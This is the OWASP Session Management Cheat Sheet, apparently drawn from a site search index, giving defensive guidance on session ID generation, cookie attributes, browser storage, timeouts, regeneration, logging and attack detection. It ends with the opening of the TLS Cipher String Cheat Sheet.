Once an authenticated session has been established, the session ID (or token) is temporarily equivalent to the strongest authentication method used by the application, such as username and password, passphrases, one-time passwords (OTP), client-based digital certificates, smartcards, or biometrics (such as fingerprint or eye retina). See the OWASP Authentication Cheat Sheet.

HTTP is a stateless protocol (RFC2616 section 5), where each request and response pair is independent of other web interactions. Therefore, in order to introduce the concept of a session, it is required to implement session management capabilities that link both the authentication and access control (or authorization) modules commonly available in web applications:

The session ID or token binds the user authentication credentials (in the form of a user session) to the user HTTP traffic and the appropriate access controls enforced by the web application. The complexity of these three components (authentication, session management, and access control) in modern web applications, plus the fact that its implementation and binding resides on the web developer's hands (as web development frameworks do not provide strict relationships between these modules), makes the implementation of a secure session management module very challenging.

The disclosure, capture, prediction, brute force, or fixation of the session ID will lead to session hijacking (or sidejacking) attacks, where an attacker is able to fully impersonate a victim user in the web application. Attackers can perform two types of session hijacking attacks, targeted or generic. In a targeted attack, the attacker's goal is to impersonate a specific (or privileged) web application victim user. For generic attacks, the attacker's goal is to impersonate (or get access as) any valid or legitimate user in the web application.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#session-id-properties","title":"Session ID Properties","text":"

In order to keep the authenticated state and track the users progress within the web application, applications provide users with a session identifier (session ID or token) that is assigned at session creation time, and is shared and exchanged by the user and the web application for the duration of the session (it is sent on every HTTP request). The session ID is a name=value pair.

With the goal of implementing secure session IDs, the generation of identifiers (IDs or tokens) must meet the following properties.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#session-id-name-fingerprinting","title":"Session ID Name Fingerprinting","text":"

The name used by the session ID should not be extremely descriptive nor offer unnecessary details about the purpose and meaning of the ID.

The session ID names used by the most common web application development frameworks can be easily fingerprinted, such as PHPSESSID (PHP), JSESSIONID (J2EE), CFID & CFTOKEN (ColdFusion), ASP.NET_SessionId (ASP .NET), etc. Therefore, the session ID name can disclose the technologies and programming languages used by the web application.

It is recommended to change the default session ID name of the web development framework to a generic name, such as id.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#session-id-length","title":"Session ID Length","text":"

The session ID must be long enough to prevent brute force attacks, where an attacker can go through the whole range of ID values and verify the existence of valid sessions.

The session ID length must be at least 128 bits (16 bytes).

NOTE:

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#session-id-entropy","title":"Session ID Entropy","text":"

The session ID must be unpredictable (random enough) to prevent guessing attacks, where an attacker is able to guess or predict the ID of a valid session through statistical analysis techniques. For this purpose, a good CSPRNG (Cryptographically Secure Pseudorandom Number Generator) must be used.

The session ID value must provide at least 64 bits of entropy (if a good PRNG is used, this value is estimated to be half the length of the session ID).

Additionally, a random session ID is not enough; it must also be unique to avoid duplicated IDs. A random session ID must not already exist in the current session ID space.

NOTE:

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#session-id-content-or-value","title":"Session ID Content (or Value)","text":"

The session ID content (or value) must be meaningless to prevent information disclosure attacks, where an attacker is able to decode the contents of the ID and extract details of the user, the session, or the inner workings of the web application.

The session ID must simply be an identifier on the client side, and its value must never include sensitive information (or PII).

The meaning and business or application logic associated with the session ID must be stored on the server side, and specifically, in session objects or in a session management database or repository.

The stored information can include the client IP address, User-Agent, e-mail, username, user ID, role, privilege level, access rights, language preferences, account ID, current state, last login, session timeouts, and other internal session details. If the session objects and properties contain sensitive information, such as credit card numbers, it is required to duly encrypt and protect the session management repository.

It is recommended to use the session ID created by your language or framework. If you need to create your own sessionID, use a cryptographically secure pseudorandom number generator (CSPRNG) with a size of at least 128 bits and ensure that each sessionID is unique.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#session-management-implementation","title":"Session Management Implementation","text":"

The session management implementation defines the exchange mechanism that will be used between the user and the web application to share and continuously exchange the session ID. There are multiple mechanisms available in HTTP to maintain session state within web applications, such as cookies (standard HTTP header), URL parameters (URL rewriting \u2013 RFC2396), URL arguments on GET requests, body arguments on POST requests, such as hidden form fields (HTML forms), or proprietary HTTP headers.

The preferred session ID exchange mechanism should allow defining advanced token properties, such as the token expiration date and time, or granular usage constraints. This is one of the reasons why cookies (RFCs 2109 & 2965 & 6265) are one of the most extensively used session ID exchange mechanisms, offering advanced capabilities not available in other methods.

The usage of specific session ID exchange mechanisms, such as those where the ID is included in the URL, might disclose the session ID (in web links and logs, web browser history and bookmarks, the Referer header or search engines), as well as facilitate other attacks, such as the manipulation of the ID or session fixation attacks.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#built-in-session-management-implementations","title":"Built-in Session Management Implementations","text":"

Web development frameworks, such as J2EE, ASP .NET, PHP, and others, provide their own session management features and associated implementation. It is recommended to use these built-in frameworks versus building a home made one from scratch, as they are used worldwide on multiple web environments and have been tested by the web application security and development communities over time.

However, be advised that these frameworks have also presented vulnerabilities and weaknesses in the past, so it is always recommended to use the latest version available, that potentially fixes all the well-known vulnerabilities, as well as review and change the default configuration to enhance its security by following the recommendations described along this document.

The storage capabilities or repository used by the session management mechanism to temporarily save the session IDs must be secure, protecting the session IDs against local or remote accidental disclosure or unauthorized access.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#used-vs-accepted-session-id-exchange-mechanisms","title":"Used vs. Accepted Session ID Exchange Mechanisms","text":"

A web application should make use of cookies for session ID exchange management. If a user submits a session ID through a different exchange mechanism, such as a URL parameter, the web application should avoid accepting it as part of a defensive strategy to stop session fixation.

NOTE:

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#transport-layer-security","title":"Transport Layer Security","text":"

In order to protect the session ID exchange from active eavesdropping and passive disclosure in the network traffic, it is essential to use an encrypted HTTPS (TLS) connection for the entire web session, not only for the authentication process where the user credentials are exchanged. This may be mitigated by HTTP Strict Transport Security (HSTS) for a client that supports it.

Additionally, the Secure cookie attribute must be used to ensure the session ID is only exchanged through an encrypted channel. The usage of an encrypted communication channel also protects the session against some session fixation attacks where the attacker is able to intercept and manipulate the web traffic to inject (or fix) the session ID on the victim's web browser (see here and here).

The following set of best practices are focused on protecting the session ID (specifically when cookies are used) and helping with the integration of HTTPS within the web application:

See the OWASP Transport Layer Protection Cheat Sheet for more general guidance on implementing TLS securely.

It is important to emphasize that TLS does not protect against session ID prediction, brute force, client-side tampering or fixation; however, it does provide effective protection against an attacker intercepting or stealing session IDs through a man in the middle attack.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#cookies","title":"Cookies","text":"

The session ID exchange mechanism based on cookies provides multiple security features in the form of cookie attributes that can be used to protect the exchange of the session ID:

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#secure-attribute","title":"Secure Attribute","text":"

The Secure cookie attribute instructs web browsers to only send the cookie through an encrypted HTTPS (SSL/TLS) connection. This session protection mechanism is mandatory to prevent the disclosure of the session ID through MitM (Man-in-the-Middle) attacks. It ensures that an attacker cannot simply capture the session ID from web browser traffic.

Forcing the web application to only use HTTPS for its communication (even when port TCP/80, HTTP, is closed in the web application host) does not protect against session ID disclosure if the Secure cookie has not been set - the web browser can be deceived to disclose the session ID over an unencrypted HTTP connection. The attacker can intercept and manipulate the victim user traffic and inject an HTTP unencrypted reference to the web application that will force the web browser to submit the session ID in the clear.

See also: SecureFlag

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#httponly-attribute","title":"HttpOnly Attribute","text":"

The HttpOnly cookie attribute instructs web browsers not to allow scripts (e.g. JavaScript or VBscript) an ability to access the cookies via the DOM document.cookie object. This session ID protection is mandatory to prevent session ID stealing through XSS attacks. However, if an XSS attack is combined with a CSRF attack, the requests sent to the web application will include the session cookie, as the browser always includes the cookies when sending requests. The HttpOnly cookie only protects the confidentiality of the cookie; the attacker cannot use it offline, outside of the context of an XSS attack.

See the OWASP XSS (Cross Site Scripting) Prevention Cheat Sheet.

See also: HttpOnly

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#samesite-attribute","title":"SameSite Attribute","text":"

SameSite defines a cookie attribute preventing browsers from sending a SameSite flagged cookie with cross-site requests. The main goal is to mitigate the risk of cross-origin information leakage, and provides some protection against cross-site request forgery attacks.

See also: SameSite

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#domain-and-path-attributes","title":"Domain and Path Attributes","text":"

The Domain cookie attribute instructs web browsers to only send the cookie to the specified domain and all subdomains. If the attribute is not set, by default the cookie will only be sent to the origin server. The Path cookie attribute instructs web browsers to only send the cookie to the specified directory or subdirectories (or paths or resources) within the web application. If the attribute is not set, by default the cookie will only be sent for the directory (or path) of the resource requested and setting the cookie.

It is recommended to use a narrow or restricted scope for these two attributes. In this way, the Domain attribute should not be set (restricting the cookie just to the origin server) and the Path attribute should be set as restrictive as possible to the web application path that makes use of the session ID.

Setting the Domain attribute to a too permissive value, such as example.com allows an attacker to launch attacks on the session IDs between different hosts and web applications belonging to the same domain, known as cross-subdomain cookies. For example, vulnerabilities in www.example.com might allow an attacker to get access to the session IDs from secure.example.com.

Additionally, it is recommended not to mix web applications of different security levels on the same domain. Vulnerabilities in one of the web applications would allow an attacker to set the session ID for a different web application on the same domain by using a permissive Domain attribute (such as example.com) which is a technique that can be used in session fixation attacks.

Although the Path attribute allows the isolation of session IDs between different web applications using different paths on the same host, it is highly recommended not to run different web applications (especially from different security levels or scopes) on the same host. Other methods can be used by these applications to access the session IDs, such as the document.cookie object. Also, any web application can set cookies for any path on that host.

Cookies are vulnerable to DNS spoofing/hijacking/poisoning attacks, where an attacker can manipulate the DNS resolution to force the web browser to disclose the session ID for a given host or domain.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#expire-and-max-age-attributes","title":"Expire and Max-Age Attributes","text":"

Session management mechanisms based on cookies can make use of two types of cookies, non-persistent (or session) cookies, and persistent cookies. If a cookie presents the Max-Age (that has preference over Expires) or Expires attributes, it will be considered a persistent cookie and will be stored on disk by the web browser based until the expiration time.

Typically, session management capabilities to track users after authentication make use of non-persistent cookies. This forces the session to disappear from the client if the current web browser instance is closed. Therefore, it is highly recommended to use non-persistent cookies for session management purposes, so that the session ID does not remain on the web client cache for long periods of time, from where an attacker can obtain it.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#html5-web-storage-api","title":"HTML5 Web Storage API","text":"

The Web Hypertext Application Technology Working Group (WHATWG) describes the HTML5 Web Storage APIs, localStorage and sessionStorage, as mechanisms for storing name-value pairs client-side. Unlike HTTP cookies, the contents of localStorage and sessionStorage are not automatically shared within requests or responses by the browser and are used for storing data client-side.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#the-localstorage-api","title":"The localStorage API","text":""},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#scope","title":"Scope","text":"

Data stored using the localStorage API is accessible by pages which are loaded from the same origin, which is defined as the scheme (https://), host (example.com), port (443) and domain/realm (example.com). This provides similar access to this data as would be achieved by using the secure flag on a cookie, meaning that data stored from https could not be retrieved via http. Due to potential concurrent access from separate windows/threads, data stored using localStorage may be susceptible to shared access issues (such as race-conditions) and should be considered non-locking (Web Storage API Spec).

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#duration","title":"Duration","text":"

Data stored using the localStorage API is persisted across browsing sessions, extending the timeframe in which it may be accessible to other system users.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#offline-access","title":"Offline Access","text":"

The standards do not require localStorage data to be encrypted-at-rest, meaning it may be possible to directly access this data from disk.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#use-case","title":"Use Case","text":"

WHATWG suggests the use of localStorage for data that needs to be accessed across windows or tabs, across multiple sessions, and where large (multi-megabyte) volumes of data may need to be stored for performance reasons.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#the-sessionstorage-api","title":"The sessionStorage API","text":""},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#scope_1","title":"Scope","text":"

The sessionStorage API stores data within the window context from which it was called, meaning that Tab 1 cannot access data which was stored from Tab 2. Also, like the localStorage API, data stored using the sessionStorage API is accessible by pages which are loaded from the same origin, which is defined as the scheme (https://), host (example.com), port (443) and domain/realm (example.com). This provides similar access to this data as would be achieved by using the secure flag on a cookie, meaning that data stored from https could not be retrieved via http.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#duration_1","title":"Duration","text":"

The sessionStorage API only stores data for the duration of the current browsing session. Once the tab is closed, that data is no longer retrievable. This does not necessarily prevent access, should a browser tab be reused or left open. Data may also persist in memory until a garbage collection event.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#offline-access_1","title":"Offline Access","text":"

The standards do not require sessionStorage data to be encrypted-at-rest, meaning it may be possible to directly access this data from disk.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#use-case_1","title":"Use Case","text":"

WHATWG suggests the use of sessionStorage for data that is relevant for one-instance of a workflow, such as details for a ticket booking, but where multiple workflows could be performed in other tabs concurrently. The window/tab bound nature will keep the data from leaking between workflows in separate tabs.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#web-workers","title":"Web Workers","text":"

Web Workers run JavaScript code in a global context separate from the one of the current window. A communication channel with the main execution window exists, which is called MessageChannel.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#use-case_2","title":"Use Case","text":"

Web Workers are an alternative for browser storage of (session) secrets when storage persistence across page refresh is not a requirement. For Web Workers to provide secure browser storage, any code that requires the secret should exist within the Web Worker and the secret should never be transmitted to the main window context.

Storing secrets within the memory of a Web Worker offers the same security guarantees as an HttpOnly cookie: the confidentiality of the secret is protected. Still, an XSS attack can be used to send messages to the Web Worker to perform an operation that requires the secret. The Web Worker will return the result of the operation to the main execution thread.

The advantage of a Web Worker implementation compared to an HttpOnly cookie is that a Web Worker allows for some isolated JavaScript code to access the secret; an HttpOnly cookie is not accessible to any JavaScript. If the frontend JavaScript code requires access to the secret, the Web Worker implementation is the only browser storage option that preserves the secret confidentiality.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#session-id-life-cycle","title":"Session ID Life Cycle","text":""},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#session-id-generation-and-verification-permissive-and-strict-session-management","title":"Session ID Generation and Verification: Permissive and Strict Session Management","text":"

There are two types of session management mechanisms for web applications, permissive and strict, related to session fixation vulnerabilities. The permissive mechanism allows the web application to initially accept any session ID value set by the user as valid, creating a new session for it, while the strict mechanism enforces that the web application will only accept session ID values that have been previously generated by the web application.

The session tokens should be handled by the web server if possible or generated via a cryptographically secure random number generator.

Although the most common mechanism in use today is the strict one (more secure), PHP defaults to permissive. Developers must ensure that the web application does not use a permissive mechanism under certain circumstances. Web applications should never accept a session ID they have never generated, and in case of receiving one, they should generate and offer the user a new valid session ID. Additionally, this scenario should be detected as a suspicious activity and an alert should be generated.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#manage-session-id-as-any-other-user-input","title":"Manage Session ID as Any Other User Input","text":"

Session IDs must be considered untrusted, as any other user input processed by the web application, and they must be thoroughly validated and verified. Depending on the session management mechanism used, the session ID will be received in a GET or POST parameter, in the URL or in an HTTP header (e.g. cookies). If web applications do not validate and filter out invalid session ID values before processing them, they can potentially be used to exploit other web vulnerabilities, such as SQL injection if the session IDs are stored on a relational database, or persistent XSS if the session IDs are stored and reflected back afterwards by the web application.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#renew-the-session-id-after-any-privilege-level-change","title":"Renew the Session ID After Any Privilege Level Change","text":"

The session ID must be renewed or regenerated by the web application after any privilege level change within the associated user session. The most common scenario where the session ID regeneration is mandatory is during the authentication process, as the privilege level of the user changes from the unauthenticated (or anonymous) state to the authenticated state though in some cases still not yet the authorized state. Common scenarios to consider include; password changes, permission changes, or switching from a regular user role to an administrator role within the web application. For all sensitive pages of the web application, any previous session IDs must be ignored, only the current session ID must be assigned to every new request received for the protected resource, and the old or previous session ID must be destroyed.

The most common web development frameworks provide session functions and methods to renew the session ID, such as request.getSession(true) & HttpSession.invalidate() (J2EE), Session.Abandon() & Response.Cookies.Add(new...) (ASP .NET), or session_start() & session_regenerate_id(true) (PHP).

The session ID regeneration is mandatory to prevent session fixation attacks, where an attacker sets the session ID on the victim user's web browser instead of gathering the victim's session ID, as in most of the other session-based attacks, and independently of using HTTP or HTTPS. This protection mitigates the impact of other web-based vulnerabilities that can also be used to launch session fixation attacks, such as HTTP response splitting or XSS (see here and here).

A complementary recommendation is to use a different session ID or token name (or set of session IDs) pre and post authentication, so that the web application can keep track of anonymous users and authenticated users without the risk of exposing or binding the user session between both states.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#considerations-when-using-multiple-cookies","title":"Considerations When Using Multiple Cookies","text":"

If the web application uses cookies as the session ID exchange mechanism, and multiple cookies are set for a given session, the web application must verify all cookies (and enforce relationships between them) before allowing access to the user session.

It is very common for web applications to set a user cookie pre-authentication over HTTP to keep track of unauthenticated (or anonymous) users. Once the user authenticates in the web application, a new post-authentication secure cookie is set over HTTPS, and a binding between both cookies and the user session is established. If the web application does not verify both cookies for authenticated sessions, an attacker can make use of the pre-authentication unprotected cookie to get access to the authenticated user session (see here and here).

Web applications should try to avoid the same cookie name for different paths or domain scopes within the same web application, as this increases the complexity of the solution and potentially introduces scoping issues.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#session-expiration","title":"Session Expiration","text":"

In order to minimize the time period an attacker can launch attacks over active sessions and hijack them, it is mandatory to set expiration timeouts for every session, establishing the amount of time a session will remain active. Insufficient session expiration by the web application increases the exposure of other session-based attacks, as for the attacker to be able to reuse a valid session ID and hijack the associated session, it must still be active.

The shorter the session interval is, the lesser the time an attacker has to use the valid session ID. The session expiration timeout values must be set accordingly with the purpose and nature of the web application, and balance security and usability, so that the user can comfortably complete the operations within the web application without his session frequently expiring.

Both the idle and absolute timeout values are highly dependent on how critical the web application and its data are. Common idle timeouts ranges are 2-5 minutes for high-value applications and 15-30 minutes for low risk applications. Absolute timeouts depend on how long a user usually uses the application. If the application is intended to be used by an office worker for a full day, an appropriate absolute timeout range could be between 4 and 8 hours.

When a session expires, the web application must take active actions to invalidate the session on both sides, client and server. The latter is the most relevant and mandatory from a security perspective.

For most session exchange mechanisms, client side actions to invalidate the session ID are based on clearing out the token value. For example, to invalidate a cookie it is recommended to provide an empty (or invalid) value for the session ID, and set the Expires (or Max-Age) attribute to a date from the past (in case a persistent cookie is being used): Set-Cookie: id=; Expires=Friday, 17-May-03 18:45:00 GMT

In order to close and invalidate the session on the server side, it is mandatory for the web application to take active actions when the session expires, or the user actively logs out, by using the functions and methods offered by the session management mechanisms, such as HttpSession.invalidate() (J2EE), Session.Abandon() (ASP .NET) or session_destroy()/unset() (PHP).

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#automatic-session-expiration","title":"Automatic Session Expiration","text":""},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#idle-timeout","title":"Idle Timeout","text":"

All sessions should implement an idle or inactivity timeout. This timeout defines the amount of time a session will remain active in case there is no activity in the session, closing and invalidating the session upon the defined idle period since the last HTTP request received by the web application for a given session ID.

The idle timeout limits the chances an attacker has to guess and use a valid session ID from another user. However, if the attacker is able to hijack a given session, the idle timeout does not limit the attacker's actions, as they can generate activity on the session periodically to keep the session active for longer periods of time.

Session timeout management and expiration must be enforced server-side. If the client is used to enforce the session timeout, for example using the session token or other client parameters to track time references (e.g. number of minutes since login time), an attacker could manipulate these to extend the session duration.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#absolute-timeout","title":"Absolute Timeout","text":"

All sessions should implement an absolute timeout, regardless of session activity. This timeout defines the maximum amount of time a session can be active, closing and invalidating the session upon the defined absolute period since the given session was initially created by the web application. After invalidating the session, the user is forced to (re)authenticate again in the web application and establish a new session.

The absolute session limits the amount of time an attacker can use a hijacked session and impersonate the victim user.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#renewal-timeout","title":"Renewal Timeout","text":"

Alternatively, the web application can implement an additional renewal timeout after which the session ID is automatically renewed, in the middle of the user session, and independently of the session activity and, therefore, of the idle timeout.

After a specific amount of time since the session was initially created, the web application can regenerate a new ID for the user session and try to set it, or renew it, on the client. The previous session ID value would still be valid for some time, accommodating a safety interval, before the client is aware of the new ID and starts using it. At that time, when the client switches to the new ID inside the current session, the application invalidates the previous ID.

This scenario minimizes the amount of time a given session ID value, potentially obtained by an attacker, can be reused to hijack the user session, even when the victim user session is still active. The user session remains alive and open on the legitimate client, although its associated session ID value is transparently renewed periodically during the session duration, every time the renewal timeout expires. Therefore, the renewal timeout complements the idle and absolute timeouts, specially when the absolute timeout value extends significantly over time (e.g. it is an application requirement to keep the user sessions open for long periods of time).

Depending on the implementation, potentially there could be a race condition where the attacker with a still valid previous session ID sends a request before the victim user, right after the renewal timeout has just expired, and obtains first the value for the renewed session ID. At least in this scenario, the victim user might be aware of the attack as her session will be suddenly terminated because her associated session ID is not valid anymore.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#manual-session-expiration","title":"Manual Session Expiration","text":"

Web applications should provide mechanisms that allow security aware users to actively close their session once they have finished using the web application.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#logout-button","title":"Logout Button","text":"

Web applications must provide a visible and easily accessible logout (logoff, exit, or close session) button that is available on the web application header or menu and reachable from every web application resource and page, so that the user can manually close the session at any time. As described in Session_Expiration section, the web application must invalidate the session at least on server side.

NOTE: Unfortunately, not all web applications facilitate users to close their current session. Thus, client-side enhancements allow conscientious users to protect their sessions by helping to close them diligently.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#web-content-caching","title":"Web Content Caching","text":"

Even after the session has been closed, it might be possible to access the private or sensitive data exchanged within the session through the web browser cache. Therefore, web applications must use restrictive cache directives for all the web traffic exchanged through HTTP and HTTPS, such as the Cache-Control and Pragma HTTP headers, and/or equivalent META tags on all or (at least) sensitive web pages.

Independently of the cache policy defined by the web application, if caching web application contents is allowed, the session IDs must never be cached, so it is highly recommended to use the Cache-Control: no-cache=\"Set-Cookie, Set-Cookie2\" directive, to allow web clients to cache everything except the session ID (see here).

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#additional-client-side-defenses-for-session-management","title":"Additional Client-Side Defenses for Session Management","text":"

Web applications can complement the previously described session management defenses with additional countermeasures on the client side. Client-side protections, typically in the form of JavaScript checks and verifications, are not bullet proof and can easily be defeated by a skilled attacker, but can introduce another layer of defense that has to be bypassed by intruders.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#initial-login-timeout","title":"Initial Login Timeout","text":"

Web applications can use JavaScript code in the login page to evaluate and measure the amount of time since the page was loaded and a session ID was granted. If a login attempt is tried after a specific amount of time, the client code can notify the user that the maximum amount of time to log in has passed and reload the login page, hence retrieving a new session ID.

This extra protection mechanism tries to force the renewal of the session ID pre-authentication, avoiding scenarios where a previously used (or manually set) session ID is reused by the next victim using the same computer, for example, in session fixation attacks.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#force-session-logout-on-web-browser-window-close-events","title":"Force Session Logout On Web Browser Window Close Events","text":"

Web applications can use JavaScript code to capture all the web browser tab or window close (or even back) events and take the appropriate actions to close the current session before closing the web browser, emulating that the user has manually closed the session via the logout button.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#disable-web-browser-cross-tab-sessions","title":"Disable Web Browser Cross-Tab Sessions","text":"

Web applications can use JavaScript code once the user has logged in and a session has been established to force the user to re-authenticate if a new web browser tab or window is opened against the same web application. The web application does not want to allow multiple web browser tabs or windows to share the same session. Therefore, the application tries to force the web browser to not share the same session ID simultaneously between them.

NOTE: This mechanism cannot be implemented if the session ID is exchanged through cookies, as cookies are shared by all web browser tabs/windows.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#automatic-client-logout","title":"Automatic Client Logout","text":"

JavaScript code can be used by the web application in all (or critical) pages to automatically logout client sessions after the idle timeout expires, for example, by redirecting the user to the logout page (the same resource used by the logout button mentioned previously).

The benefit of enhancing the server-side idle timeout functionality with client-side code is that the user can see that the session has finished due to inactivity, or even can be notified in advance that the session is about to expire through a count down timer and warning messages. This user-friendly approach helps to avoid loss of work in web pages that require extensive input data due to server-side silently expired sessions.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#session-attacks-detection","title":"Session Attacks Detection","text":""},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#session-id-guessing-and-brute-force-detection","title":"Session ID Guessing and Brute Force Detection","text":"

If an attacker tries to guess or brute force a valid session ID, they need to launch multiple sequential requests against the target web application using different session IDs from a single (or set of) IP address(es). Additionally, if an attacker tries to analyze the predictability of the session ID (e.g. using statistical analysis), they need to launch multiple sequential requests from a single (or set of) IP address(es) against the target web application to gather new valid session IDs.

Web applications must be able to detect both scenarios based on the number of attempts to gather (or use) different session IDs and alert and/or block the offending IP address(es).

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#detecting-session-id-anomalies","title":"Detecting Session ID Anomalies","text":"

Web applications should focus on detecting anomalies associated to the session ID, such as its manipulation. The OWASP AppSensor Project provides a framework and methodology to implement built-in intrusion detection capabilities within web applications focused on the detection of anomalies and unexpected behaviors, in the form of detection points and response actions. Instead of using external protection layers, sometimes the business logic details and advanced intelligence are only available from inside the web application, where it is possible to establish multiple session related detection points, such as when an existing cookie is modified or deleted, a new cookie is added, the session ID from another user is reused, or when the user location or User-Agent changes in the middle of a session.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#binding-the-session-id-to-other-user-properties","title":"Binding the Session ID to Other User Properties","text":"

With the goal of detecting (and, in some scenarios, protecting against) user misbehaviors and session hijacking, it is highly recommended to bind the session ID to other user or client properties, such as the client IP address, User-Agent, or client-based digital certificate. If the web application detects any change or anomaly between these different properties in the middle of an established session, this is a very good indicator of session manipulation and hijacking attempts, and this simple fact can be used to alert and/or terminate the suspicious session.

Although these properties cannot be used by web applications to trustingly defend against session attacks, they significantly increase the web application detection (and protection) capabilities. However, a skilled attacker can bypass these controls by reusing the same IP address assigned to the victim user by sharing the same network (very common in NAT environments, like Wi-Fi hotspots) or by using the same outbound web proxy (very common in corporate environments), or by manually modifying his User-Agent to look exactly as the victim users does.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#logging-sessions-life-cycle-monitoring-creation-usage-and-destruction-of-session-ids","title":"Logging Sessions Life Cycle: Monitoring Creation, Usage, and Destruction of Session IDs","text":"

Web applications should increase their logging capabilities by including information regarding the full life cycle of sessions. In particular, it is recommended to record session related events, such as the creation, renewal, and destruction of session IDs, as well as details about its usage within login and logout operations, privilege level changes within the session, timeout expiration, invalid session activities (when detected), and critical business operations during the session.

The log details might include a timestamp, source IP address, web target resource requested (and involved in a session operation), HTTP headers (including the User-Agent and Referer), GET and POST parameters, error codes and messages, username (or user ID), plus the session ID (cookies, URL, GET, POST\u2026).

Sensitive data like the session ID should not be included in the logs in order to protect the session logs against session ID local or remote disclosure or unauthorized access. However, some kind of session-specific information must be logged in order to correlate log entries to specific sessions. It is recommended to log a salted-hash of the session ID instead of the session ID itself in order to allow for session-specific log correlation without exposing the session ID.

In particular, web applications must thoroughly protect administrative interfaces that allow to manage all the current active sessions. Frequently these are used by support personnel to solve session related issues, or even general issues, by impersonating the user and looking at the web application as the user does.

The session logs become one of the main web application intrusion detection data sources, and can also be used by intrusion protection systems to automatically terminate sessions and/or disable user accounts when (one or many) attacks are detected. If active protections are implemented, these defensive actions must be logged too.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#simultaneous-session-logons","title":"Simultaneous Session Logons","text":"

It is the web application design decision to determine if multiple simultaneous logons from the same user are allowed from the same or from different client IP addresses. If the web application does not want to allow simultaneous session logons, it must take effective actions after each new authentication event, implicitly terminating the previously available session, or asking the user (through the old, new or both sessions) about the session that must remain active.

It is recommended for web applications to add user capabilities that allow checking the details of active sessions at any time, monitor and alert the user about concurrent logons, provide user features to remotely terminate sessions manually, and track account activity history (logbook) by recording multiple client details such as IP address, User-Agent, login date and time, idle time, etc.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#session-management-waf-protections","title":"Session Management WAF Protections","text":"

There are situations where the web application source code is not available or cannot be modified, or when the changes required to implement the multiple security recommendations and best practices detailed above imply a full redesign of the web application architecture, and therefore, cannot be easily implemented in the short term.

In these scenarios, or to complement the web application defenses, and with the goal of keeping the web application as secure as possible, it is recommended to use external protections such as Web Application Firewalls (WAFs) that can mitigate the session management threats already described.

Web Application Firewalls offer detection and protection capabilities against session based attacks. On the one hand, it is trivial for WAFs to enforce the usage of security attributes on cookies, such as the Secure and HttpOnly flags, applying basic rewriting rules on the Set-Cookie header for all the web application responses that set a new cookie.

On the other hand, more advanced capabilities can be implemented to allow the WAF to keep track of sessions, and the corresponding session IDs, and apply all kind of protections against session fixation (by renewing the session ID on the client-side when privilege changes are detected), enforcing sticky sessions (by verifying the relationship between the session ID and other client properties, like the IP address or User-Agent), or managing session expiration (by forcing both the client and the web application to finalize the session).

The open-source ModSecurity WAF, plus the OWASP Core Rule Set, provide capabilities to detect and apply security cookie attributes, countermeasures against session fixation attacks, and session tracking features to enforce sticky sessions.

"},{"location":"cheatsheets/TLS_Cipher_String_Cheat_Sheet.html","title":"TLS Cipher String Cheat Sheet","text":""},{"location":"cheatsheets/TLS_Cipher_String_Cheat_Sheet.html#introduction","title":"Introduction","text":"

The Mozilla Foundation provides an easy-to-use secure configuration generator for web, database, and mail software. This online (and well updated) tools allows site administrators to select the software they are using and receive a configuration file that is both safe and compatible for a wide variety of browser versions and server software.

For more information please visit https://ssl-config.mozilla.org/.

